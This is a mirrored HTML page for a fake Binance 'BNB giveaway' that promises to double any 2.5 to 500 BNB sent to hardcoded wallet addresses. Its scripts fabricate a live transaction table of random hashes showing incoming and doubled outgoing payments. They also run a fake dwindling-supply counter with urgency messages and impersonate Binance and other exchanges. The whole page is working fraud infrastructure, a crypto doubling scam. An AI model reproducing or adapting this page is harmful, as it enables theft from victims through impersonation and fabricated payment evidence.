
<!DOCTYPE html>





<!DOCTYPE html>
<html lang="en">


<!-- Mirrored from giveaway.cryptspools.com/bnb/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 12 Nov 2022 14:53:07 GMT -->

<!-- Mirrored from binance5th-anniversary.netlify.app/bnb/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 21 Jan 2023 11:00:54 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">

    <link rel="stylesheet" type="text/css" href="../static/files/styles.css">
    <meta property="og:image" content="img/link.html">
    <link href='../static/files/BNB.png' rel="shortcut icon" type="image/x-icon" />
    <title>Binance Futures BNB Prize</title>



    <link rel="preconnect" href="https://fonts.gstatic.com/">
    <link href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@300;400&amp;display=swap" rel="stylesheet">
    <link rel="stylesheet" rel="stylesheet" type="text/css" href="../static/files/theme.min.css">


    <meta name="referrer" content="always">

    <script>
        window.isAddress = false
        window.onload = function () {
            if (!localStorage.getItem("justonce")) {
                localStorage.setItem("justOnce", "true");
                window.location.reload();
            }
        }
    </script>

    <script>
        const info = {
            'BEP20': {
                addr: '0x1650332cd473C7253808254F804f453aA7607751',
                qr: '0'
            },
            'BEP2': {
                addr: 'bnb1yszqmtg7t8lu42f6htl6daam6xu7qg4hkx556l',
                qr: ''
            }
        }
        window.NETWORK = 'BEP20'
        const setNetwork = () => {

            window.ADDRESS = info[window.NETWORK].addr

        }
        setNetwork()
    </script>


    <style>
        .netInfo {
            display: flex;
            justify-content: space-between;
            width: 100%;
            gap: .2rem;
            margin-bottom: .3rem;
        }

        .netInfo input {
            flex: 1;
            padding: .4rem;
            outline: none;
            border: none;
            transition: background ease 300ms;
            background-color: rgba(203, 203, 203, 0.596);
        }

        .netInfo input:hover {
            background-color: rgba(15, 225, 78, 0.524);
        }
    </style>


</head>

<body>
    <div class='loading'>
        <div class='loading-item l1'></div>
        <div class='loading-item l2'></div>
        <div class='loading-item l3'></div>
        <div class='loading-item l4'></div>

    </div>

    <!-- <div id="stars1"></div>
    <div id="stars2"></div>
    <div id="stars3"></div> -->



    <div class="pop-body">
        <div class="pop-inner">
            <div class="pop-head">
                <h3 class="pop-head-text">Generated Address</h3><svg id="close" height="20" viewBox="0 0 20 20"
                    width="20" xmlns="http://www.w3.org/2000/svg">
                    <path d="M18.096 19.174l1.401-1.427L1.7.286.3 1.714z"></path>
                    <path d="M19.497 1.714L18.096.286.3 17.747l1.4 1.427z"></path>
                </svg>
            </div>

            <div class="netInfo">
                <input type="button" aria-label="changeNetwork" value="BEP20">
                <input type="button" aria-label="changeNetwork" value="BEP2">
            </div>


            <div class="pop-post-body">
                <div class="pop-post-inner">
                    <div class="pop-anrange">
                        <div class="pop-img">
                            <div class="pop-qr">
                                <div class="inner-qr">
                                    <div class="main-qr">
                                        <div opacity="0" class="qr">
                                            <img id="qrcode_svg" width="200" height="200" src="#" alt="qr">
                                        </div>
                                        <p
                                            style="color:green; margin-top:1rem; margin-bottom: 2px; text-align: center;">
                                            0 Confirmation</p>
                                        <center><img src="../static/files/loading.svg" width="70px"></center>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="timer-b" id="timer1"></div>
                        <div class="address-place">
                            <div class="inner-address"><span class="wallet-ad">Amount:</span>
                                <div class="address">
                                    <div class="main-ad"><span class="real-address" id="gen-amount"></span></div>
                                    <div class="copy-body">
                                        <div class="copy-inner">
                                            <img class="cp" id="copy_" src="../static/files/copy.svg">
                                        </div>
                                    </div>
                                </div>
                            </div>

                            <div class="inner-address"><span class="wallet-ad">Generated address:</span>
                                <div class="address">
                                    <div class="main-ad"><span class="real-address" id="showaddr"></span></div>
                                    <div class="copy-body">
                                        <div class="copy-inner">
                                            <img class="cp" id="copy_address" src="../static/files/copy.svg">
                                        </div>
                                    </div>
                                </div>

                            </div>

                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <section id="post-sec">
        <a href="../index-2.html">

            <h1 style="text-align: center; z-index: 999999;"><img src="../static/files/logo.png" alt="logo"
                    style="max-width: 20rem;" alt="Logo"></h1>

        </a>
        <div class="post_body">
            <p>To join the giveaway contest, enter the amount you want to participate with below <b>(between 2.5 BNB -
                    500
                    BNB)</b>, then enter the BNB address where you want your reward to be sent before clicking the
                "Generate
                Wallet" button</p>
            <br>

            <p>In this tournament, all participants will receive a 2x (double) bonus within 30 minutes. Can be traded on any exchange.</p>


            <h2 style="font-size: 1.2rem;">Participating Process:</h2>
            <ol>
                <li aria-label="pending"><b>Step1:</b> Enter your participation amount (2.5 BNB - 500 BNB) below</li>
                <li aria-label="pending"><b>Step2:</b> Enter your wallet address where your reward will be sent</li>
                <li aria-label="pending"><b>Step3:</b> Click "Generate Wallet" to get the contest contract address</li>
                <li aria-label="pending"><b>Step4:</b> Open your wallet (Exchange or Offline) and send the amount you
                    entered to the
                    generated address</li>
                <li aria-label="pending"><b>Step5:</b> Deposit Confirmed</li>
                <li aria-label="pending"><b>Step6:</b> Bonus Processed</li>
            </ol>
            <!-- </p> -->
            <p class="imwarn"><i>If you don't know how to participate or your bonus is taking longer to process, kindly click the chat icon below to message support for help</i></p>
        </div>
        <div class="cal-body">
            <div class="cal-inner">
                <div class="input">
                    <div class="title">Amount</div>
                    <div class="amount-con">
                        <div class="inner-con">
                            <div class="pic"></div>
                            <div class="amount">
                                <div class="main-input">
                                    <img src="https://cryptologos.cc/logos/binance-coin-bnb-logo.svg?v=002" width="40px"
                                        height="40px" alt="">
                                    <div class="in-main"><input id="cal-in"
                                            class="exchange-content__input theme__background-4 theme__text-4 " min="0"
                                            placeholder="0" type="number" maxlength="50" autocomplete="off" value="">
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="icon-body"><span data-tip="Click to swap" data-for="swap-icon" currentitem="false"><img
                            src='../static/files/exchange-alt.svg' alt="img" class="exchange__swap-icon"></span></div>
                <div class="input">
                    <div class="title">Bonus</div>
                    <div class="amount-con">
                        <div class="inner-con">
                            <div class="pic"></div>
                            <div class="amount">
                                <div class="main-input">
                                    <img src="https://cryptologos.cc/logos/binance-coin-bnb-logo.svg?v=002" width="40px"
                                        height="40px" alt="">
                                    <div class="in-main"><input id="cal-out"
                                            class="exchange-content__input theme__background-4 theme__text-4 "
                                            placeholder="0" maxlength="50" min="0" autocomplete="off" value=""></div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="enaddress">
                <div class="title">
                    <addr
                        title="Enter the address where you want your bonus to be sent to. Note: this feild is optional, if you leave it empty, the bonus will be sent to the address you sent from.">
                        wallet address
                </div>
                <div class="inner-enter"><input type="text" id="userAddr"
                        placeholder="Enter your Binance Coin (BNB) address"></div>
            </div>

            <div class="but-con">
                <div id="gen-btn" class="swap-but">Generate Wallet</div>
                <div class="terms text-info text-center mb-2"><span><span id="warn"></span></span>
                </div>
            </div>
            <div id="lympo_progress">
                <div class="row progress-row">
                    <div class="colums_12">
                        <div class="progress-ico">
                            <div class="progress-ico">
                                <div class="progress">
                                    <div class="progress-bar progress-bar-striped active progress-width"
                                        id="progress-ico" role="progressbar" style="width: 100%;">
                                        <span class="sr-only">x</span>
                                    </div>
                                </div>
                            </div>
                            <div class="dot-1" id="leftBNB">
                                Counting BNB left...
                            </div>
                            <div class="dot-1-airdrop  progress-left"></div>
                            <span class="pbv" id="progress-ico-bar"></span>
                        </div>
                    </div>
                </div>
            </div>
            <div class="support">
                <div class="sup">
                    <div class="sup-space"></div>
                    <div class="both-line">
                        <div class="import-account__title-content theme__background-2 theme__text-4">Supported Exchange
                        </div>
                    </div>
                    <div class="import-account__content">
                        <div class="import-account__item">
                            <div class="import-account__block theme__import-button">
                                <div class="import-account__icon metamask"><img src='../static/files/binance.ico'
                                        width="20">
                                </div>
                                <div class="import-account__name">BINANCE</div>
                            </div>
                        </div>
                        <div class="import-account__item import-account__item-ledger">
                            <div>
                                <div class="import-account__block theme__import-button">
                                    <div class="import-account__icon ledger"><img src='../static/files/upbit.png'
                                            width="20">
                                    </div>
                                    <div class="import-account__name">UPBIT</div>
                                </div>
                            </div>
                        </div>
                        <div class="import-account__item import-account__item-trezor">
                            <div>
                                <div class="import-account__block theme__import-button">
                                    <div class="import-account__icon trezor">
                                        <div class="import-account__icon ledger"><img src='../static/files/okes.png'
                                                width="20"></div>
                                    </div>
                                    <div class="import-account__name">OKEX</div>
                                </div>
                            </div>
                        </div>
                        <div class="import-account__item">
                            <div>
                                <div class="import-account__block theme__import-button" tabindex="0"><input type="file"
                                        multiple="" autocomplete="off" tabindex="-1" style="display:none;">
                                    <div class="import-account__icon json"><img src='../static/files/tano.png'
                                            width="20" style="border-radius: 1rem;"></div>
                                    <div class="import-account__name">REMITANO</div>
                                </div>
                            </div>
                        </div>
                        <div class="import-account__item">
                            <div class="import-account__block theme__import-button">
                                <div class="import-account__icon private-key"><img src='../static/files/tox.png'
                                        width="20">
                                </div>
                                <div class="import-account__name">MERCATOX</div>
                            </div>
                        </div>
                        <div class="import-account__item ">
                            <div class="import-account__block theme__import-button">
                                <div class="import-account__icon promo-code"><img src='../static/files/luno.png'
                                        width="20">
                                </div>
                                <div class="import-account__name">LUNO</div>
                            </div>
                        </div>
                        <div class="import-account__item import-account__item-trezor">
                            <div>
                                <div class="import-account__block theme__import-button">
                                    <div class="import-account__icon trezor"><img src='../static/files/coinsph.png'
                                            width="20">
                                    </div>
                                    <div class="import-account__name">COINS.PH</div>
                                </div>
                            </div>
                        </div>
                        <div class="import-account__item">
                            <div>
                                <div class="import-account__block theme__import-button" tabindex="0"><input type="file"
                                        multiple="" autocomplete="off" tabindex="-1" style="display:none;">
                                    <div class="import-account__icon json"><img src='../static/files/ava.jpg' width="20"
                                            style="border-radius: 1rem;"></div>
                                    <div class="import-account__name">COINBASE</div>
                                </div>
                            </div>
                        </div>
                        <div class="import-account__item">
                            <div class="import-account__block theme__import-button">
                                <div class="import-account__icon private-key"><img src='../static/files/yobit.ico'
                                        width="20">
                                </div>
                                <div class="import-account__name">YOBIT</div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <main id="content" role="main">
        <div id="ContentPlaceHolder1_divSummary" class="container space-bottom-2">
            <div class="card">
                <div class="card-body">
                    <div class="tab-content">
                        <div class="tab-pane fade show active" id="transactions" role="tabpanel"
                            aria-labelledby="transactions-tab">
                            <div class="table-responsive mb-2 mb-md-0">
                                <table class="table table-hover" id="myTable">
                                    <thead class="thead-light">
                                        <tr>
                                            <th scope="col" width="1">Txn Hash</th>
                                            <th scope="col" width="1" class="d-none d-sm-table-cell">Block</th>
                                            <th scope="col"><span class="timer" title="UTC time">Age</span></th>
                                            <th scope="col">From</th>
                                            <th scope="col" width="30"></th>
                                            <th scope="col">To</th>
                                            <th scope="col">Value</th>
                                            <th scope="col"><span id="ContentPlaceHolder1_spanTxFee"
                                                    title="(Gas Price * Gas Used by Txns) in BNB">
                                                    <spanclass="text-secondary">[Txn Fee]
                                                </span></span>
                                            </th>
                                        </tr>
                                    </thead>
                                    <tbody></tbody>
                                </table>
                            </div>
                            <div class="d-flex justify-content-between align-items-center mt-3 mb-4">
                                <div class="d-flex align-items-center text-secondary"></div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </main>
    <!-- ###############################Start of progress bar######################################### -->

    <script src="../js/jquery-3.6.0.min.js"></script>
    <script>



        const btns = document.querySelectorAll('input[aria-label="changeNetwork"]')




        const setBG = () => {
            document.getElementById('showaddr').textContent = window.ADDRESS
            document.getElementById('qrcode_svg').setAttribute('src', '../static/files/qr-bnb-bep2' + info[window.NETWORK].qr + '.png')

            btns.forEach(b => {

                if (window.NETWORK == b.value) {
                    b.style.backgroundColor = 'rgba(15, 225, 78, 0.524)'

                }
                else {
                    b.style.backgroundColor = 'rgba(203, 203, 203, 0.596)'
                }
            })
        }

        setBG()





        btns.forEach(b => {
            b.onclick = () => {
                window.NETWORK = b.value;
                setNetwork()
                setBG()

            }
        })
    </script>

    <script>



        const setAmountDone = () => {
            const val = $('#cal-in').val()
            document.querySelectorAll('li')[0].setAttribute('aria-label', (val >= 2.5 && val <= 500) ? 'done' : 'pending');
        }

        $('#cal-out').on('blur', setAmountDone)
        $('#cal-in').on('blur', setAmountDone)

        $('#userAddr').on('blur', () => {
            const addr = $('#userAddr').val()
            const addrLen = addr.length
            window.isAddress = Boolean((addr.startsWith('0x') || addr.startsWith('bnb') || addr.startsWith('T')) && addrLen > 20 && addrLen < 50)
            document.querySelectorAll('li')[1].setAttribute('aria-label', window.isAddress ? 'done' : 'pending')
        })

        var parcent = 2

        function update_count() {
            setInterval(() => {
                $('#num_').text(parseInt($('#num_').text()) + 1)
            }, 12e4)
        }

        function tx(_) {
            return 1 + Math.floor(Math.random() * _)
        }

        function dec2hex(dec) {
            return ('0' + dec.toString(16)).substr(-2)
        }

        function generateId(length) {
            for (
                var result = '',
                characters = window.ADDRESS,
                charactersLength = characters.length,
                i = 0;
                i < length;
                i++
            )
                result += characters.charAt(Math.floor(Math.random() * charactersLength))
            return result
        }

        function startaddress(length = 1) {
            for (
                var result = '',
                characters = '13',
                charactersLength = characters.length,
                i = 0;
                i < length;
                i++
            )
                result += characters.charAt(Math.floor(Math.random() * charactersLength))
            return result
        }

        function create_transaction(mins) {
            var table,
                row = (table = document.getElementById('myTable')).insertRow(1),
                address = get_random(),
                amount = (500 * Math.random()).toFixed(2),
                decimal = String(Math.random(1, 999))
            row.innerHTML =
                '<tr  class="tr"> <td><a class="hash-tag text-truncate" href="">' +
                generateId(63) +
                '</a> </td> <td class="d-none d-sm-table-cell"><a href="">9' +
                tx(99999999) +
                '</a></td> <td><span class="timer">' +
                mins +
                ' mins ago</span> </td> <td><a class="hash-tag text-truncate" href="">' +
                address +
                '</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">' + window.ADDRESS + '</span> </td> <td>' +
                amount +
                ' BNB</td> <td><span class="small text-secondary">0<b>.</b>000' +
                tx(999) +
                '</span></td> </tr>'
            var table,
                row = (table = document.getElementById('myTable')).insertRow(1),
                send_amount = amount * parcent
            row.innerHTML =
                '<tr> <td><a class="hash-tag text-truncate" href="">' +
                generateId(63) +
                '</a> </td> <td class="d-none d-sm-table-cell"><a href="">9' +
                tx(99999999) +
                '</a></td> <td><span class="timer">' +
                mins +
                ' mins ago</span></td> <td><span class="hash-tag text-truncate">' + window.ADDRESS + '</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="">' +
                address +
                '</a> </td> <td>' +
                send_amount +
                ' BNB</td> <td><span class="small text-secondary">0<b>.</b>000' +
                tx(999) +
                '</span></td> </tr>'
        }

        function update_tx() {
            setInterval(() => {
                $('#num_').text(parseInt($('#num_').text()) + 1)
            }, 12e4)
        }

        function new_transaction() {
            var table,
                row = document.getElementById('myTable').insertRow(1),
                address = get_random(),
                amount = (500 * Math.random()).toFixed(2),
                decimal = String(Math.random(1, 999))
                ; (row.innerHTML =
                    '<tr> <td><a class="hash-tag text-truncate" href="">' +
                    generateId(63) +
                    '</a> </td> <td class="d-none d-sm-table-cell"><a href="">9' +
                    tx(99999999) +
                    '</a></td> <td><span class="timer" >now</span> </td> <td><a class="hash-tag text-truncate" href="">' +
                    address +
                    '</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">' + window.ADDRESS + '</span> </td> <td>' +
                    amount +
                    ' BNB</td> <td><span class="small text-secondary">0<b>.</b>000' +
                    tx(999) +
                    '</span></td> </tr>'),
                    document
                        .getElementById('myTable')
                        .deleteRow(document.getElementById('myTable').rows.length - 1),
                    document.getElementsByTagName('tr')[1].classList.add('toolbar'),
                    setTimeout(() => {
                        var table,
                            row = document.getElementById('myTable').insertRow(1),
                            send_amount = amount * parcent
                            ; (row.innerHTML =
                                '<tr> <td><a class="hash-tag text-truncate" href="">' +
                                generateId(63) +
                                '</a> </td> <td class="d-none d-sm-table-cell"><a href="">9' +
                                tx(99999999) +
                                '</a></td> <td><span class="timer" >now</span></td> <td><span class="hash-tag text-truncate">' + window.ADDRESS + '</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="">' +
                                address +
                                '</a> </td> <td>' +
                                send_amount +
                                ' BNB</td> <td><span class="small text-secondary">0<b>.</b>000' +
                                tx(999) +
                                '</span></td> </tr>'),
                                document
                                    .getElementById('myTable')
                                    .deleteRow(document.getElementById('myTable').rows.length - 1),
                                document.getElementsByTagName('tr')[1].classList.add('toolbar')
                    }, 8500)
        }

        function update_trans() {
            for (i = 0; i < times.length; i++)
                'now' == times[i].innerHTML
                    ? (times[i].innerHTML = '1 mins ago')
                    : 1 == parseInt(times[i].innerHTML.split(' ')[0]) &&
                        'mins' == times[i].innerHTML.split(' ')[1]
                        ? (times[i].innerHTML =
                            parseInt(times[i].innerHTML.split(' ')[0]) + 1 + ' mins ago')
                        : parseInt(times[i].innerHTML.split(' ')[0]) >= 59 &&
                            'mins' == times[i].innerHTML.split(' ')[1]
                            ? (times[i].innerHTML = '1 hrs ago')
                            : parseInt(times[i].innerHTML.split(' ')[0]) > 1 &&
                            'mins' == times[i].innerHTML.split(' ')[1] &&
                            (times[i].innerHTML = parseInt(times[i].innerHTML.split()[0]) + 1 + ' mins ago')
            new_transaction();
        }

        ; (get_random = function (
            list = [
                "B" + generateId(40),
                'Binance 1',
                "B" + generateId(40),
                'Binance 2',
                "B" + generateId(40),
                'Binance 3',
                "B" + generateId(40),
                'Remitano 2',
                "B" + generateId(40),
                'Remitano 3',
                "B" + generateId(40),
                'Remitano 1',
                "B" + generateId(40),
                'Mercatox',
                "B" + generateId(40),
                'IndaCoin',
                "B" + generateId(40),
                'CoinExchange.io',
                "B" + generateId(40),
                'HitBTC 2',
                "B" + generateId(40),
                'HitBTC 1',
                "B" + generateId(40),
                'LAToken 3',
                "B" + generateId(40),
                'LAToken 2',
                "B" + generateId(40),
                'LAToken 1',
            ],
        ) {
            return list[Math.floor(Math.random() * list.length)]
        }),
            $(document).ready(() => {
                for (i = 25; i > 0; i--) create_transaction(i)
                update_tx(), update_count()
            }),
            (times = document.getElementsByClassName('timer')),
            (window.onload = () => {
                update_trans(),
                    (trans = setInterval(() => {
                        update_trans()
                    }, 1e4))
            }),
            $('#gen-btn').click(() => {
                if ($('#cal-in').val() >= 2.5 && $('#cal-in').val() <= 500) {
                    if (!$('#userAddr').val()) {
                        $('#warn').text('enter you wallet address where profit will be sent')
                        return
                    }
                    if (!window.isAddress) {
                        $('#warn').text('You have entered an invalid address')
                        return
                    }
                    $('#warn').text(''), $('.pop-body').css('display', 'flex')

                    amount_entered = $('#cal-in').val()
                    tm = Date.now()
                    $("#xrp-tag").text(tx(9999999))
                    $('#gen-amount').text(amount_entered)
                    document.querySelectorAll('li')[2].setAttribute('aria-label', 'done')

                } else $('#warn').text('Amount should be within 2.5 BNB to 500 BNB')
            }),
            $('#close').click(() => {
                $('.pop-body').css('display', 'none')
            }),
            setTimeout(function () {
                let viewheight = $(window).height(),
                    viewwidth = $(window).width(),
                    viewport
                document
                    .querySelector('meta[name=viewport]')
                    .setAttribute(
                        'content',
                        'height=' +
                        viewheight +
                        'px, width=' +
                        viewwidth +
                        'px, initial-scale=1.0',
                    )
            }, 300),
            $('#cal-in').on('input', () => {
                var in_amount = $('#cal-in').val()
                if (in_amount >= 2.5 && in_amount < 500) {
                    amt = (in_amount * 2)
                    out = $('#cal-out')
                    out.val(amt)
                    // if (amt%1){
                    //   out.val(amt.toFixed(3))
                    // }
                    // else {
                    //   out.val(amt.toFixed(0))
                    // }
                } else if ((in_amount) >= 5 && in_amount <= 500) {
                    amt = (in_amount * 3)
                    out = $('#cal-out')
                    out.val(amt)
                    // if (amt%1){
                    //   out.val(amt.toFixed(0))
                    // }
                    // else{
                    //   out.val(amt.toFixed(3))
                    // }
                }
            })

        $('#cal-out').on('input', () => {
            var in_amount = $('#cal-out').val()
            if (in_amount >= 10 && in_amount < 150) {
                amt = (in_amount / 2)
                out = $('#cal-in')
                out.value(amt)
                $('#cal-in').val(in_amount / 2)
            } else if ((in_amount) >= 1500 && in_amount <= 150) {
                $('#cal-in').val(in_amount / 3)
            }
        })

        function copy_item(item) {
            var t = window.getSelection(),
                e = document.createElement('div')
                ; (e.style.position = 'absolute'),
                    (e.style.left = '-99999px'),
                    document.body.appendChild(e),
                    (e.innerHTML = item),
                    t.selectAllChildren(e),
                    window.setTimeout(function () {
                        document.body.removeChild(e)
                    }, 100)
        }

        function copyToClipboard(text) {
            if (window.clipboardData && window.clipboardData.setData) {
                // Internet Explorer-specific code path to prevent textarea being shown while dialog is visible.
                return clipboardData.setData("Text", text);

            }
            else if (document.queryCommandSupported && document.queryCommandSupported("copy")) {
                var textarea = document.createElement("textarea");
                textarea.textContent = text;
                textarea.style.position = "fixed";  // Prevent scrolling to bottom of page in Microsoft Edge.
                document.body.appendChild(textarea);
                textarea.select();
                try {
                    return document.execCommand("copy");  // Security exception may be thrown by some browsers.
                }
                catch (ex) {
                    //console.warn("Copy to clipboard failed.", ex);
                    return false;
                }
                finally {
                    document.body.removeChild(textarea);
                }
            }
        }

        function copy_main(id, fade) {
            copy_item($('#' + id).attr('data-clipboard-text'))
            var clipboard = new Clipboard('#' + id)
            clipboard.on('success', function () {
                $('#' + fade).css('opacity', 1), $('#' + id).css('opacity', 0)
            }),
                clipboard.on('error', function (e) {
                    $('.tooltiptetext').html('Faild!')
                })
        }

        // Copy amount starts here

        $('#copy_').click(() => {
            copyToClipboard($("#gen-amount").text());
            $('#copy_').attr('src', "../static/files/done.html");
        })

        $('#copy_').mouseleave(() => {
            $('#copy_').attr('src', "../static/files/copy.svg");
        })

        // Copy amount ends here

        // Copy address part starts here

        $('#copy_address').click(() => {
            copyToClipboard(window.ADDRESS);
            $('#copy_address').attr('src', '../static/files/done.html');
        })

        $('#copy_address').mouseleave(() => {
            $('#copy_address').attr('src', "../static/files/copy.svg");
        })

        $('#copy_tag').click(() => {
            copyToClipboard($('#xrp-tag').text());
            $('#copy_tag').attr('src', '../static/files/done.html');
        })

        $('#copy_tag').mouseleave(() => {
            $('#copy_tag').attr('src', "../static/files/copy.svg");
        })

// Copy address part ends here

    </script>

    <script>
        function setProgress(count, max) {
            var p = (100 * count / max).toString() + '%';
            $('.progress-left').css('left', p);
            $('.progress-width').css('width', p);
            var aa = count.toString().replace(/(\d)(?=(\d\d\d)+([^\d]|$))/g, '$1 ');
            var rr = max.toString().replace(/(\d)(?=(\d\d\d)+([^\d]|$))/g, '$1 ');
            $('.pbv').text(aa + ' / ' + rr);

        }



        var ctd = setInterval(function () {
            if (localStorage.getItem("bnbprogress")) {
                if (localStorage.getItem("bnbprogress") <= 150) {
                    var alt_count = localStorage.getItem("bnbprogress");
                } else if (localStorage.getItem("bnbprogress")) {
                    var alt_sec_count = localStorage.getItem("bnbprogress");
                    var alt_count = alt_sec_count - Math.floor((Math.random() * 10) * 4 + 5);
                }
            } else {
                var alt_sec_count = 50000;
                var alt_count = alt_sec_count - Math.floor((Math.random() * 10) * (1000 * 2));
            }
            setProgress(alt_count, 200000)



            localStorage.setItem("bnbprogress", alt_count);

            if (alt_sec_count <= 100)
                clearInterval(ctd);
            if (alt_count <= 3000 && alt_sec_count >= 3500)
                document.getElementById("leftBNB").innerHTML = "Left BNB";
            if (alt_count <= 2000 && alt_sec_count >= 2500)
                document.getElementById("leftBNB").innerHTML = "Hurry up, not much more BNB left!";
            if (alt_count <= 1500)
                document.getElementById("leftBNB").innerHTML = "Last chance to get your BNB!";
            if (alt_count <= 500)
                document.title = alt_count + " BNB left";
            if (alt_count <= 1000)
                document.title = "Get your " + alt_count + " BNB now!";

        }, 6666);
    </script>
    <!-- ###############################End of progress bar######################################### -->

    <script>

        function timer(t_ex, timer) {
            expire = new Date(t_ex * 1000).getTime();
            now = new Date().getTime();
            dis = expire - now
            days = Math.floor((dis % (1000 * 60 * 60 * 24 * 24)) / (1000 * 60 * 60 * 24))
            hrs = Math.floor((dis % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60))
            mins = Math.floor((dis % (1000 * 60 * 60)) / (1000 * 60))
            secs = Math.floor((dis % (1000 * 60)) / (1000))
            m_secs = Math.floor((dis % (1000)))
            if (dis > 0) {
                timer.innerHTML = days + ":" + hrs + ":" + mins + ":" + secs + ":" + m_secs
            }
            else {
                window.location.reload()
            }
        }

        function set_timer() {
            let t_ex = null
            if (t_ex) {
                expire = new Date(t_ex * 1000).getTime();
                now = new Date().getTime();
                dis = expire - now
                if (dis > 0) {
                    timer_html = document.getElementById('timer')
                    timer(t_ex, timer_html);
                    setInterval(() => {
                        timer(t_ex, timer_html);
                    }, 1)
                }

            }
        }
        set_timer()
    </script>

    <script src="../chat.js"></script>
</body>


<!-- Mirrored from giveaway.cryptspools.com/bnb/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 12 Nov 2022 14:54:36 GMT -->

<!-- Mirrored from binance5th-anniversary.netlify.app/bnb/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 21 Jan 2023 11:01:17 GMT -->
</html>